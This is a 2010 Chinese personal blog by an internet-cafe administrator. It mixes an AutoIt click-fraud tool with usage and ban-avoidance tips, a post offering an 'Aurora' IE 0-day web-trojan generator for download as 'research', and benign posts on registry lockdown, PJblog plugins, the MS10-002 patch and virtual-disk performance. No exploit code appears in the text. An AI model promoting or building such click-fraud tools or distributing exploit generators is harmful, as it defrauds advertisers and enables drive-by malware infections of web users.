更新时间：2010-02-07 03:30(修正程序窗口居中问题)
               2010-02-09 19:19(增加随机点击搜索功能)
               2010-03-24 16:00(增加配置文件、自启动功能)
               2010-04-10 12:30(增加关键字更新、运行次数统计功能)
               2010-07-06 03:30(自定义关闭搜索结果页面时间)
===================================

使用说明：

1、填写你自己的增值主页，如：http://www.sogou.com/index.htm?pid=xxx-xxx-xxx。

2、选择模式，一般来说都是普通模式，除了5258那个变态点击搜索后结果是在新IE窗口出现（这个就是所谓的弹窗模式），做搜索的公司大部分都采用了IFrame框架，他们的增值主页除了广告还是广告。

3、点击按钮，该干嘛干嘛去，延迟时间最好设十秒以上吧，要不真的封号了。

软件说明：

1、采用AU3脚本语言，主要是运用了IE的UDF，运行后模拟点击搜索结果。

2、keywords.txt为关键字文件，请自行获取。

3、过滤了百度、搜搜、谷歌、搜狗、有道的无效（相对于增值）链接与竞价排名链接。.

配置说明(Autose.ini)：
[setting]
delay=1            ;延迟时间
Random1=5      ;随机点击搜索结果最小时间
Random2=6      ;随机点击搜索结果最大时间
Random3=5      ;关闭搜索结果页面时间
Url=http://baidu.com    ;网址
Mode=0            ;自启动模式 0为不自启动 1为普通模式自启动    2为弹窗模式自启动
若选择模式后要改回，手动在Autose.ini里直接改。

下载链接已删除

附www.virscan.org 扫描结果：
扫描结果 :   8%的杀软(3/36)报告发现病毒

软件名称  引擎版本        病毒库版本            病毒库时间                  扫描结果
AntiVir     8.2.1.242     7.10.7.111          2010-05-14           SPR/AutoIt.Gen
VBA32     3.12.12.5    20100513.2041    2010-05-13       Trojan.Win32.VB.abvz
金山毒霸  2009.2.5.15 2010.5.14.21       2010-05-14     Win32.Troj.FakeIE.c.798720

解决易游强制安装的百度地址栏软件

180045@163.com(毒药) — Mon,01 Feb 2010 05:09:17 +0800
      不得不说，一波未平一波又起，继首页被强制成百度后盛天易游又马不停蹄地采取了一系列的手段，例如PCL(X).exe进程弹出窗口式广告和最近一个月来的百度地址栏插件。在易游论坛上骂街的人有之、不知所措者有之，更多的是选择了沉默。可笑的是某某版主或某代理商们用百度地址栏升级为籍口以此打发网吧的从业人员，慢慢地易游这个圈子也变成了一滩混水，利益当前、何惧流氓！

    下面是解决这一问题的简单方法：
    在D:\UserData$\Globalconfig 中新建一INI文件，如baidu.ini，填写如下代码：


复制内容到剪贴板程序代码
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects [8]


   [8]代表的是everyone只读，这个regini的用法与参数略过。

   在D:\UserData$\Globalconfig 中新建System.bat(这个是易游的开机批处理，有用着的朋友可以直接编辑)


复制内容到剪贴板程序代码
regini d:\sysset\menu\baidu.ini


   经测试，如此操作后重启客户机，IE没有被强制安装上百度地址栏，策略生效。
   注：此方法对于GOOGLE插件或淘宝、银行插件都没有影响，至于其它的插件没有深入测试。
   此外，论坛上有人提出封8048端口，限于条件未作研究。

PJblog的滚动公告插件代码

180045@163.com(毒药) — Sun,31 Jan 2010 03:57:25 +0800
    自己搜了一下百度，结果显示PJblog要在正文前加滚动公告的方法大概有几个，以下就列出常用的两种。

一、添加新模块

    1、进入后台的[界面设置] - [设置模块]中，添加一个新模块，模块标识与模块名称均为自定义，例如我是如下图设置的：


    这里要注意的一点是排序那里一定要小于ContentList，否则公告便跑浏览器底部了。

    2、添加模块后，在[模块操作]里点编辑HTML，输入以下内容：

复制内容到剪贴板程序代码

蓝色部分为公告内容，请自行修改。效果如本站首页所示。

二、使用公告插件

点击下载此文件

     解压后上传到Plugins目录，再在后台的[界面设置] - [安装插件]中找到并安装Bulletin Board就行了。

   设置图：


     效果如下：

     若要自定义公告栏的颜色或字体等等，请修改插件中install.xml的相应代码。

PJblog的Ping服务

180045@163.com(毒药) — Sat,30 Jan 2010 05:12:18 +0800
    百度PING服务开了几个月了吧，反正我是不知道——老是追着人家的屁股走，思想落后啊！很是无语。这几天看着百度的收录百思不得其解，为了提高收录速度，看来也需要花点心思了。
    Wordpress自带这个功能，PJblog~看来名气还是不够响。

在blogpost.asp 页面找到

复制内容到剪贴板程序代码
lArticle.logPwtips = pwtips
    postLog = lArticle.postLog
    Set lArticle = Nothing

在下面添加
复制内容到剪贴板程序代码
Const PingContent="http://www.feedsky.com/api/RPC2|http://blogsearch.google.com/ping/RPC2|
http://blog.yodao.com/ping/RPC2|http://www.xianguo.com/xmlrpc/ping.php|http://www.zhuaxia.c
om/rpc/server.php|http://ping.baidu.com/ping/RPC2|http://rpc.pingomatic.com|http://blog.iask.com
/RPC2"
Function SendPing
    Dim Url,Urls
    Urls=Split(Replace(PingContent,vbCr,""),"|")
    For Each Url In Urls
        If Trim(Url)<>"" Then
            Call SendPing_Single(url)
        End If
    Next
End Function

Function SendPing_Single(url)
    On Error Resume Next
    Dim s,sUrl
                If blog_postFile = 2 Then
                 sUrl = siteURL&"article/"&postLog(2)&".htm"
              else
                sUrl = siteURL&"default.asp?id="&postLog(2)
                end if
    s = ""
    s = s&"weblogUpdates.ping"
    s = s&""&SiteName&""
    s = s&""&sUrl&""
    s = s&""
    Response.Write "
发送Ping到:" & Url & "
"
    Response.Flush
    Dim objPing
    Set objPing = Server.CreateObject("MSXML2.ServerXMLHTTP")
    objPing.SetTimeOuts 10000, 10000, 10000, 10000
    '第一个数值：解析DNS名字的超时时间10秒
    '第二个数值：建立Winsock连接的超时时间10秒
    '第三个数值：发送数据的超时时间10秒
    '第四个数值：接收response的超时时间10秒
    objPing.open "POST",url,False
    objPing.setRequestHeader "Content-Type", "text/xml"
    objPing.send s
    Set objPing = Nothing
    Err.Clear
End Function
Call SendPing

注：绿色代码无换行符，请自行改为一行。
如果需要修改或者增减Ping地址，“PingContent=””，用|分开。

常用ping地址：
http://www.feedsky.com/api/RPC2
http://blog.yodao.com/ping/RPC2
http://api.my.yahoo.com/RPC2
http://blogsearch.google.com/ping/RPC2
http://www.xianguo.com/xmlrpc/ping.php
http://www.zhuaxia.com/rpc/server.php

清爽网吧留言板

180045@163.com(毒药) — Sat,30 Jan 2010 02:11:28 +0800
      大方实用，喜欢的朋友请下载：

点击下载此文件

十年QQ；十年回顾

180045@163.com(毒药) — Fri,29 Jan 2010 21:15:15 +0800
     光阴似箭，日月如梭，不知不觉间QQ已经伴着我们走过了十年。虽说自己也是第一批使用QQ的网民，但看回以前的QQ界面，总是觉得很陌生~
    以前的碧海银沙、163聊天室、MUD，已然远去~
    =====================
    以下图片来自网管联盟

1999：

2000：

2003：

2004：

2005：

2006：

2007：

2008：

2009：



自动折叠易游菜单广告

180045@163.com(毒药) — Wed,27 Jan 2010 16:54:29 +0800
      呵呵，几句代码的事情，受易游论坛yoyohotoo的启发而成。只不过yoyohotoo是模拟鼠标操作，受分辨论的限制而要相对应的写代码，总是显得麻烦。
    其实获取控制ID就成了，脚本如下：

复制内容到剪贴板程序代码
ShellExecute ( "Recreation.exe", "网络游戏", "C:\Program Files\E-yoo")  ;使用 ShellExecute API 执行一个外部程序，“网络游戏”是打开菜单时的参数，第三个是易游菜单目录

WinWaitActive("[CLASS:TfrmMain.UnicodeClass]")   ;获取易游菜单的类别名

ControlClick("[CLASS:TfrmMain.UnicodeClass]", "", "[CLASS:TRzPanel;INSTANCE:2]") ;点击折叠按钮

WinWaitActive("[ID:1574016]")  ;等待游戏菜单绘图完成，若跳过这句执行下一句则会弹出找不到焦点的错误(整合版不需要)

ControlClick("[CLASS:TfrmMain.UnicodeClass]", "", "[CLASS:TbsSkinPanel;INSTANCE:4]")  ;折叠会员中心

08与整合版测试通过。

AU3所有UDF全汉化下载

180045@163.com(毒药) — Tue,26 Jan 2010 14:45:02 +0800
2010/1/18第一版
一直AU3的UDF都没有完全汉化，这次AU3中文论坛netegg 将其汉化，总算了了这个遗憾。
原帮助全部翻译完成！！！后续查错工作，需要大家一起努力了，如果有翻译不准确的地方，请直接在论坛里提出或者发邮件LXL1976@gmail.com告知。

补充说明：原帮助中有些函数的输出是在scite的控制台里面，没有都改成外部的可见输出，在慢慢改，如果碰见没有输出的示例，请选择“保存到本地”，在scite编辑器里运行

终于有UDF的汉化了，不用以前靠示例脚本来判断函数的功能了。呵呵！

点击下载此文件

做原创很难，但还是要坚持

180045@163.com(毒药) — Tue,26 Jan 2010 13:19:11 +0800
     不知不觉建站已有半年，文章才那么的几十篇，还不如人家做的垃圾站——流量哗哗的。
   但对我自己来说，blog不过是记录自己工作的点滴，宗旨是坚持原创，转载是有的~毕竟是少数，若果一股脑儿的这里抄一篇，那里袭一把，相信量很快就会上来。只是没有这样的必要。
   今天粗粗的看了一下文章，也需要检讨下自己——粗浅的知识自己不愿意去写，高深的也写不来，但在网络同行中，按那个20%理论，也就是说新手占八成，技术顶尖的占两成。所以有必要打破下原来我自己定下的界线，分享，才是最大的乐事。

Pubwin非法检测软件(网吧收银守护神) by 流星无语

180045@163.com(毒药) — Mon,25 Jan 2010 03:04:05 +0800
功能简介:

通过Pubwin后台（网页形式）的客户机列表得到当前未上机客户机信息，安全;
通过WinPcap底层发包的方式获取客户机开机状态，准确度高，速度快;
默认3分钟扫描一次，默认连续检测到3次为开机状态报警。
如果未超过连续检测次数则显示黄色，超过后显示红色。
自动对扫描结果加色、排序，检测结果一目了然。

VIP功能:
可用语音报出非法上机者的机号。
可保存非法上机日志供以后参考。
可设置不检测admin用户。
可设置参数保护。
可自动重启或关闭非法机。
可屏蔽PUBWIN2007开机锁屏广告。

软件截图:

主窗口

设置窗口1

设置窗口2

点击下载此文件

MS10-002:“极光”IE漏洞补丁

180045@163.com(毒药) — Sat,23 Jan 2010 04:34:45 +0800
　  北京时间1月22日凌晨，“极光IE漏洞”引发的第一波挂马攻击刚刚开始在网上泛滥，微软就以前所未有的速度紧急发布了编号为“MS10-002”的安全补丁KB978207，以尽快修复这一高危漏洞。
　　
    据专家介绍，“极光IE漏洞”存在于IE6/7/8等浏览器版本中，如果用户没有及时修复这一漏洞，同时又没有使用有效的安全软件，一旦访问了利用该漏洞挂马的恶意网页，电脑就会自动下载运行黑客指定的木马程序，使网银、网游账号和个人隐私面临被盗的危险。

　　来自监测数据显示，1月17日晚起，网上木马团伙开始针对这一漏洞发起有组织的攻击，相关挂马网站数量在短短4天内激增到17322家，此次“极光IE漏洞”从漏洞信息公开到修复不过一周时间，速度之快在微软自身历史上鲜有先例。据了解，微软通常在月度安全更新中发布安全补丁，只有在漏洞影响特别严重的情况下，才会打破惯例紧急发布补丁。此前有消息称，“极光IE漏洞”最近导致了Google等数十家高科技企业遭受黑客袭击，德、法、澳等国政府为此甚至建议民众暂停使用IE浏览器。

　　附1：微软本次安全公告链接：

　　http://www.microsoft.com/technet/security/bulletin/MS10-002.mspx

　　附2：微软MS10-002(KB978207)安全补丁信息：

　　描述：本次安全更新解决了7个私下报告和一个公开披露的IE漏洞。如果某个用户使用IE查看了一个经过特殊构造的网页，这些严重的漏洞将可能导致电脑被执行远程代码。相比那些拥有较低权限账户的用户而言，使用管理员权限登录的用户系统可能受到该漏洞的影响要更大。.

　　附3：涉及操作系统平台与IE版本：

　　Windows2000SP4：IE5.01SP4、IE6SP1

　　WindowsXPSP2/SP3：IE6、IE7、IE8

　　64位WindowsXP专业版SP2平台：IE6、IE7、IE8

　　32位及64位WindowsVista、WindowsVistaSP1/SP2平台：IE7、IE8

　　32位及64位Windows7平台：IE8

　　32位、Itanium及64位WindowsServer2003SP2平台：IE6、IE7、IE8

　　32位、Itanium及64位WindowsServer2008、WindowsServer2008SP2平台：IE7、IE8

　　Itanium及64位WindowsServer2008R2平台：IE8

点击下载此文件

在水一方

180045@163.com(毒药) — Fri,22 Jan 2010 19:57:38 +0800
1P、

2P、

3P、

4P、

5P、

微软“极光”0day漏洞测试(附网马生成器)

180045@163.com(毒药) — Thu,21 Jan 2010 03:57:23 +0800
    测试页面已撤消



风起“极光网马生成器”下载：

点击下载此文件

     以上所写均为网络收集，只为研究学习之用。

解开ALC889声卡之谜

180045@163.com(毒药) — Tue,19 Jan 2010 19:01:14 +0800
      前阵子网吧拿了100台的I3+H55，忙乎了2天终是搞定了所有的东西，只是客人普遍说耳机音量比原来的低了好多，还有就是这个ALC889的驱动装了上去之后居然不能语音——MIC要重新拔一下，SO：晕了。
    兴奋劲儿还没过就搞了这么个小小问题出来，不爽啊~所以我只能是拖着疲累的身躯研究了一下下。
    最后发现。。。
    。。。
    。。
    。
TMD的这ALC889原来不能禁用前置面板检测，一禁了语音就不能用，什么玩意儿，看下图

按这样的道理，音量小的原因也在这里找到了

原来我是选择了音源输出，改为耳机就一切OK。

总结：原以为ALC889与888是一样的设置，忙中出错，多做了好多功夫——切记做盘时测试好，别省那么一点点的时间。

惊曝微软“极光”0day漏洞

180045@163.com(毒药) — Tue,19 Jan 2010 04:26:37 +0800
       北京时间1月16日，微软刚证实新发现了一个IE0day漏洞，针对该漏洞的攻击代码就已开始在网上扩散。经360安全中心验证，该漏洞几乎涉及所有IE浏览器，而微软尚未推出相应补丁，攻击代码外泄将在未来几天引发大规模的网页挂马攻击。有消息称Google等30多家企业已经因此遭到黑客攻击。
    据专家介绍，这一漏洞存在于IE6\7\8等所有浏览器版本中。在特定条件下，该漏洞可以使Mshtml.dll访问已经被释放的内存从而执行任意代码。也就是说，当网民访问黑客利用该漏洞构造的“挂马网页”时，电脑将自动下载运行黑客指定的任意木马病毒，使电脑成为受到别人远程控制的“肉鸡”。
　  目前，针对这一高危0Day漏洞，微软公司只发布了一个安全公告，并未发布补丁。“但是攻击代码已在国外网站公开，包括黑客在内的几乎所有人都能轻易获得，意味着这一漏洞的危害将迅速蔓延。从历次0day漏洞公开化的规律判断，国内互联网上的大规模‘挂马’攻击将在未来几天内迅速爆发。

附：微软公司针对该IE0Day漏洞的安全公告

http://www.microsoft.com/technet/security/advisory/979352.mspx

最具有权威性的虚拟盘终极教程连载

180045@163.com(毒药) — Tue,19 Jan 2010 04:10:09 +0800
说到虚拟盘本身,相信很多的网管兄弟已经熟的不再熟了,现在的网吧,几乎每个网吧都会使用虚拟盘,但是如何用好虚拟盘,把虚拟盘真正的实力发挥出来呢?据我到全国各地网吧观察到的情况,其实能达到理想效果的网吧仍然是非常少见的.

我本人从2001年开始进入网吧直到现在.弄过的网吧也有几十家了,现在虽然因为工作太忙,网吧不太去了,但是还管着一大一小两家网吧,琢磨这些东西也能
有点年头了,有一些小小的心得,丢出来和大家一起探讨一下, 认为我说的有道理,就给点掌声,认为我在胡扯,那就丢点烂西瓜臭鸡蛋什么的.
也许有些观念和您以前的认知完全相反,也许你完全不能认同我的观点,没有关系,大家一起来讨论吧!

第一篇:<虚拟盘的价值>
所有的网吧工具和软件,都是为网吧管理而服务的,并最终为网吧生意服务.我们网管在使用这些网维软件,应该时刻都要记得,我们不仅仅要让网吧能够正常运转,最终是要让网吧的生意变得更好.
怎样让网吧生意更好,这里的原因和手段太多了,我不是来讲网吧经营的,我就仅仅从技术角度来看,咱们网管可以为网吧的生意做些什么:
1)  稳定(网吧的根本,没什么可说的)
2)  快(让顾客爽)
3)  多(满足各种顾客的需求)
4)  好(游戏优化,更新及时)
5)  省(给老板省点钱,省钱就是赚钱呀)

满足这5大要素的网吧,基本上技术就到极致了.剩下的就是技术外的问题了.
这5大要素当中,我们如何去做呢?
我的答案非常简单,弄好你的虚拟盘,把所有的游戏都放在虚拟盘上,本地的硬盘就只放个系统就可以了.
相信很多人要问了,这样真的可以吗?速度够吗?带的起吗?
我可以很明确的回答:完全可以!一台5千元的服务器就可以带150台,一台1万元的服务器可以带300台,一台2万的服务器几乎可以带上一千台,不但可以带的起,而且还比本地硬盘还要快的多的多!

这样的做法有很多的好处,我总结了以下十大优点:
1)无人值守自动更新游戏,无需推送到客户端,无需额外管理
2)好的虚拟盘,可以达到几乎无限的速度,完全突破系统的瓶颈,远比本地硬盘快的多.到底有多快,我在后面就会说明.
3)容量扩展将变的更加简单, 现在1.5T的硬盘也就8xx元,弄2个装上,代价不过16xx元而已,3T的游戏空间啥游戏不能装?
4)玩家启动游戏没有更新过程,完全无需等待
5)不会出现因为磁盘空间不足导致的游戏误删除,不怕游戏强推
6)大幅度减少磁盘扫描现象,E盘扫描可以杜绝
7)客户机方便部署,只需要GHOST系统盘
8)只要服务器管理得当,游戏分区不再有病毒问题
9)方案同样适用于所有的无盘,让无盘只负责C盘和回写,游戏完全交给虚拟盘来进行管理,既减少了无盘服务器的负载压力,又方便而易于部署
10)其实,弄个好的虚拟盘服务器并不贵,平均摊到每客户机成本还不到50元,网吧如果旧硬盘不更新的话,硬盘上省下的钱远不止这点.

明白了这些好处,接下来的问题就是如何去用好虚拟盘.

我的文章会从以下几个方面展开:
1)   一些基础的知识
2)    硬盘的基本原理和性能分析
3)    虚拟盘的性能分析
4)    虚拟盘的负载能力
5)    虚拟盘在网吧中的实际应用
6)    典型案例和推荐方案
7)    一些问题

这个"系统+虚拟盘"的方案,它并不是一个新鲜的概念,曾经有许多人也做过积极的尝试,有部分人很成功,而更多的人,因为无法解决高负载情况下的服务器性能问题,而放弃尝试.问题在哪里呢?我在后面要讲解的,就是这些成功的秘诀.

第二篇:<卡?不卡,慢还是快?带的起,带不起?>

看到一些朋友的回复,说说我的观点.
12楼问:和无盘有优势吗?
我的回答:无盘可以理解成另外一种虚拟盘,是一种把系统也放在服务器上的虚拟盘.从读的本质来说,虚拟盘和无盘是完全一样的.他们差别只在于写的问题,无盘服务器需要负载客户机的大量回写,而且写的负担远比读取要大很多.相比较而言,虚拟盘可以将所有的资源用于读,比无盘服务器要轻松的多.所以,在速度上,它们并无本质区别.

好了言归正传,今天继续开讲,先来说一些最基本的东西.
第一个问题,网吧怎样算卡,怎样算不卡,达到什么样的条件才不会卡?
这个问题看起来非常的白痴,但是真的要是去问问我们的网管,可能问100个人就会有99种说法,仔细想想,这个问题真的那么简单吗?
其实造成卡的因素非常的多,外网延迟高,内网不稳定,CPU,显卡太差,内存不足等等.今天我们这里只讨论磁盘和虚拟盘的问题,磁盘或者虚拟盘造成的卡,是和写入或者读取的速度有关的,在游戏运行过程中,速度降低到多少才会出现较为明显的停顿呢?这个因不同的游戏而异.但是基本的,我可以提供一个参考数值:1MB/S!
启动游戏时,1MB/S的速度估计会慢的让人很郁闷,但是对大多数游戏来说,只要进了游戏以后,如果任何时候都能满足1MB/S的读写速度,游戏就可以运行的很流畅.在服务器上观察客户机的读写,几乎90%以上的客户机平时读写数据都是0,偶尔读一点,也是128K,256K这样的流量,.不信的话,你可以认真的观察一下服务器的情况.很多百M内网的网吧里,在虚拟盘服务器上运行游戏,除了启动略慢一些,游戏过程中依然可以很流畅的.

对有盘的网吧来说,在本地运行的游戏要达到1MB/S的标准实在太容易了,所以有盘网吧里硬盘导致的卡是很罕见的,往往是其他的原因才会出现卡的情况.但是对无盘网吧来说,情况要糟糕一些,事实上很多无盘网吧都容易出现卡机现象,原因是无盘服务器回写的压力是非常大的,回写的文件多半细碎而且难以缓存,所以服务器硬盘常常处于负荷的极限,这种情况下是很容易卡的.我这里并不是说无盘不好,只是因为很多代理商施工的时候为了追求利润或者追求高带机量,让服务器带了过多的客户机,这样回写的压力是非常大的,很多人都对服务器性能过于乐观了.

再来说说快和慢的问题,到底磁盘要多快才够呢?我们在疯狂的做RAID0的时候,测到200-300M/S的速度的时候,也许自己还不是很满意,还想能不能再快一些,快到400M甚至500M,可是事实上我们需要那么快吗?

我们来做一些简单的分析.我们的测试客户机是这样的:
CPU 酷睿2200
显卡9600GT
内存2G
这样的机器是去年下半年网吧比较典型的配置.
这样的机器,在读取硬盘数据的时候需要多少的速度才能满足要求?才能不成为系统的瓶颈?
我们使用一个固态硬盘作为参照----OCZ的一个32G的固态硬盘来做测试,这样硬盘不会成为系统的瓶颈,CPU和显卡的处理速度才是系统的瓶颈.
测试结果是:
WINDOWS XP一般启动一次大概要读取250M左右的数据,最高启动速度为30M左右
魔兽世界进入到游戏画面,所有读取的数据大概为300M左右,最高的读取速度不到30M.
我们随后又测试了多款游戏,大部分的游戏启动,都不超过25M/S.
随后我们用PCMARK05进行测试,结果如下:

(图2-1:PCMARK05测试OCZ固态硬盘)
如图所示,模拟启动XP的速度为27MB/S,模拟程序载入时23MB/S,普通应用18MB/S,只有做模拟病毒扫描时才达到104MB/S.
初步的结论:我们这样的机器,对数据的需求最高不超过30M,在绝大多数时候,数据流量在10M以下,那么几百MB/S的硬盘是我们需要的吗?
不不,事情绝对不是那么简单的,硬盘中还隐藏着很多不为大家所熟知的秘密,
下一节我会用非常大的篇幅来仔细的讨论这个课题.

接下来我们说说负载问题,对虚拟盘服务器来说,怎样算带的起,怎样算带不起?
我的方法也很简单,找出虚拟盘服务器整个系统中最薄弱的环节,仔细测量薄弱环节的性能和能力,按照客户机平均读取流量,计算服务器能负载的极限值,然后,为服务器留出3-5倍的性能余量.这样基本上就是带的起了.
有很多种方法可以测量服务器的负载情况,如果你对自己服务器的性能掌握不太清楚的话,可以自行监测一下.
多数虚拟盘服务器的瓶颈都在于硬盘,我这里提供一个简单的监控硬盘性能的方法.
在服务器上打开开始程序管理工具性能.

(图2-2:WINDOWS自带性能监视工具)

然后选择计数器日志,新建一个磁盘监控的任务,再添加一个计数器,选择硬盘(physicaldisk),选择你要监控的磁盘分区,然后从列表选择计数器: % disk time,然后将时间周期设定为1秒,这样,系统会每一秒钟记录一次磁盘的运作情况,输出为csv格式,可以直接用excel打开分析.
如下图:

(图2-3:用WINDOWS自带性能监视工具记录服务器状态)

这里解释一下什么叫% disk time,词可翻译为磁盘工作时间的百分比,输出的数值多半为5.x,86.x,264.x,对应的意思是:这一秒钟有磁盘有5%的时间在工作,86%的时间在工作,264的意思是工作需要2.64秒才能完成,对这秒钟来说,磁盘已经远远的超过了负荷,就有可能会卡了.
这个数值100%为磁盘满负荷,小于100%,就是未满负荷,大于100%,就是超过磁盘的承受能力.
用这个计数器可以无限的记录下去,在你网吧人最多的时间,找一段数据出来分析一下,你就会知道你的服务器到底负荷怎样.

我举一个例子吧,下面这段数据是某网吧虚拟盘服务器在8月8日晚上20:00~22:00点之间记录的,这个网吧当时约90人,所有的游戏都放在该服务器上的该硬盘上(一个1.5T的希捷11代硬盘).
我用execl分析成图表如下:

(图2-3:某网吧虚拟盘服务器高峰时段的硬盘读写时间图)

分析整整2小时的数据,我将读写时间从高到低进行排列,最忙的那一秒钟在8月8号的20:53分,负荷达到了95%左右.
从整个横线的比例来说,1%不到的时间,硬盘的负荷在90%~30%之间.
大概有2%左右的时间,硬盘的负荷在30%~10之间
其他大概97%左右的时间,硬盘仅仅工作在10%的负荷之内.
这是很理想的情况,这种负载下,服务器是真的带的起,带的轻松.负载的客户机再增加5倍都没什么问题.
这里还要补充一下,并非硬盘达到100%以上客户机就会卡,在100%那一刻,没有去读数据的客户机不会卡,就算去读的客户机也不一定会卡,因为数据的需求量并不一定是那么大的,而且,1秒很快就过去了,就算数据受阻,一般也未必感觉的到,但是!经常性长期性的超过100%,那就总有碰到卡的时候.
欢迎大家自查自己的服务器,很期待看到大家贴出自己服务器的硬盘负载图.
下一节: 硬盘中的惊天大秘密!
(未完待续)

第三篇:<硬盘中的惊天大秘密!>

既然要谈论虚拟盘,那我们就先从硬盘开始说起
目前市面上可以买到的硬盘大体分为三种:
1.  普通的sata硬盘,最为常见,性能一般,转速7200转,容量从80G-2000G不等,价格低廉.无需专用接口,一般主板都支持.
2.  高级一些的SAS硬盘,属于服务器配件,需要专门的SAS接口,这种接口在高端的服务器主板上才会有,普通的主板要用sas硬盘的话,可以买专门的sas接口RAID卡.价钱较贵,一般147G的硬盘就要1K多了,速度比普通ata硬盘要快一些.
3.  新型的固态硬盘,也称为SSD,这种硬盘使用flash进行存储,没有机械结构,最大的优点是寻道时间非常低,现在最快的SSD,已经可以达到250M的读取速度,200M的写入速度,性能全面超过以前的老式硬盘,缺点是容量太小,价钱较高.一般120G的SSD就要卖到2-3K了.固态硬盘目前比较多使用在高级的服务器上,部分高端的笔记本也会使用一些SSD.

第一部分:普通的SATA硬盘:
硬盘的工作原理,可以从这段视频中清晰的看到

Flash动画
在线播放

这段视频展示了我们在删除,复制粘贴,快速格式化时,磁头的相应工作情况,印象最深的是磁头疯狂摆动的样子.

我们先来了解一些硬盘的基本概念,如图是硬盘的盘片的示意图:

图3-1:硬盘中的盘片示意图)

磁道
磁盘在格式化时被划分成许多同心圆，这些同心圆轨迹叫做磁道（Track）。磁道从外向内从0开始顺序编号。信息以脉冲串的形式记录在这些轨迹中，这些同心圆不是连续记录数据，而是被划分成一段段的圆弧,每段圆弧叫做一个扇区，扇区从“1”开始编号，每个扇区中的数据作为一个单元同时读出或写入。一个标准的3.5in硬盘盘面通常有几百到几千条磁道。磁道是“看”不见的，只是盘面上以特殊形式磁化了的一些磁化区，在磁盘格式化时就已规划完毕。

扇区
操作系统以扇区（Sector）形式将信息存储在硬盘上，每个扇区包括512个字节的数据和一些其他信息。一个扇区有两个主要部分：存储数据地点的标识符和存储数据的数据段，标识符就是扇区头标，包括组成扇区三维地址的三个数字：扇区所在的磁头（或盘面）、磁道（或柱面号）以及扇区在磁道上的位置即扇区号。

簇
簇就是更大的扇区，它可以是一个扇区、也可以是2个、4个、8个等等，它究竟有多大是在高级格式化的时候决定的。把相邻的若干个扇区组合起来就是一个簇，和扇区一样，一个簇内不允许存在两个文件，因此当储存一段比单个簇的容量还要小的数据时，会浪费一些储存空间。比如镞是64K,那么那怕只有一个字节的文档,也会占用64K的空间,对于QQGAME之类的小文件极多的游戏,浪费的空间是很大的.（查看当前硬盘簇大小的方式：在要查看的分区建立一个文本文档，随意输入几个字母，保存后查看文件属性中的占用空间，即为当前磁盘簇大小。）
簇就是我们在格式化的时候,可以选择的区块大小,从512B---128K不等,如果我们选择比较大的簇,空间会比较浪费,但是虚拟盘出盘的流量会大为减少.如下图:

(图3-2:虚拟盘出盘数据量)

这是个1.5的硬盘,几乎装满了游戏,但是出盘仅仅只要读取3M数据,这个分区是用64KB为单位进行格式化的,如果使用32KB的簇,那么出盘流量就会变成2倍:6M,如果使用默认的方式格式化(512B),那么出盘的流量就会达到300多M,这样的数据是很恐怖的,对分区硬盘大的的服务器会导致出盘的效率极度低下.
来看看这么一张截图,是用HDTUNE测试硬盘基准测试:

(图3-3:HD TUNE文件基准测试图)

对一个硬盘分别采用从512B,1K,2K…8M等从小到大的不同区块大小,进行测试读写速度,总的速度来看是逐渐升高的,到64K以后,就基本持平了,对于过小的区块大小,磁盘读取后数据的处理时间还赶不上磁头读取的速度,因此小区块造成的速度衰减是非常明显的,我们在后面的测试当中,大部分都基于64K的区块,这样反应的数据比较有价值.1M,8M这样的区块大小我不会在测试中采用,对真实应用的指导性不大,因为我们一般的虚拟盘都是基于512B-64K之间的大小来进行格式化的.
区块大小对于虚拟盘的测试会产生非常大的数据偏差.在客户机上测试网维大师的虚拟盘,用512K区块时,可以达到90M以上的读取速度,但是在64K时,只有55M的读取速度.常常在论坛上看见很多比拼虚拟盘或者无盘的读取速度,很多人都没有注意这个区块大小的问题,不同区块大小造成的测试结果偏差导致很多比拼失去了公平的意义.
平均寻道时间(Average seek time)：指硬盘在盘面上移动读写头至指定磁道寻找相应目标数据所用的时间，它描述硬盘读取数据的能力，单位为毫秒。寻道时间和这几个因素有关:盘片大小,磁头移动速度.

平均潜伏时间(Average latency　time)：指当磁头移动到数据所在的磁道后，然后等待所要的数据块继续转动到磁头下的时间，一般在2ms-6ms之间。潜伏时间和盘片转速关系最大.

平均访问时间(Average access time)：指磁头找到指定数据的平均时间，通常是平均寻道时间和平均潜伏时间之和。平均访问时间最能够代表硬盘找到某一数据所用的时间，越短的平均访问时间越好，7200转的SATA硬盘一般在11ms-18ms之间,典型的15000转SAS硬盘一般在5ms-8ms之间.现在,一般在说的平均寻道时间往往指的就是指平均访问时间,我们在后面也用平均寻道时间来代表这个平均访问时间.

Sata硬盘的性能取决于2大指标:
一是硬盘的转速,转速越高性能越好,一般的sata硬盘转速都是7200转,也有少量的5400转产品,多用在笔记本上,西数还有一种特别的迅猛龙硬盘,是一万转的,盘片是2.5寸的,比普通硬盘的3.5寸盘片小很多,转速高,盘片小,使得迅猛龙硬盘在寻道时间上比普通硬盘缩短了近一倍的时间,实际性能已经很接近于sas硬盘了.
,二是磁盘的单碟容量.存储密度的提高对性能提升是很有好处的,在磁头划过同样的距离时,密度越高的磁盘,读取的速度自然越多.这点对顺序读取的性能提升尤其非常明显.

普通的硬盘有多快呢?
我们先看一个截图:

(图3-4:HD TUNE测试希捷11代盘顺序读取)

硬盘是希捷11代的1.5硬盘,单碟容量500G,是当今最快的SATA硬盘之一.(因为测试的时候服务器还在提供负载,所以曲线不是很平滑).这个测试显示的是硬盘连续读取的状态.使用的工具是HD-TUNE PRO 3.50版本.
从这个图看,该硬盘的外圈速度已经达120MB/S以上,速度应该是非常理想了,但是我们来看另一个测试:

(图3-5:HD TUNE测试希捷11代盘随机读取)

还是那个硬盘,这次我们测试的是随机读取的速度,在硬盘中随机选取N个小点,每个小点代表64K的数据.
和上面连续读取的条件一样,都是读取64K的区块,结果速度降到了3.577MB/S,相差了近30倍.
为什么有如此大的差异呢?
因为硬盘的性能指标中,读取数据的性能远大于寻找数据的性能.
读取一个64K的数据,硬盘只需要1/2000秒,也就是0.5MS(毫秒)
但是要找到这个64K的数据,硬盘需要花费1/57秒的时间,也就是17MS.
这两个性能相差了30多倍.如果硬盘花在读取数据上的比例多,性能就会很好,如果硬盘花在寻找数据的比例多,那性能就会变的非常糟糕.

那么,在实际应用当中,哪个数据更有参考意义呢?
我的结论是硬盘的随机读取速度才代表硬盘的真正速度,因为实际在网吧里的应用大部分都是随机读取的过程,为什么这么说呢?原因有以下几点:
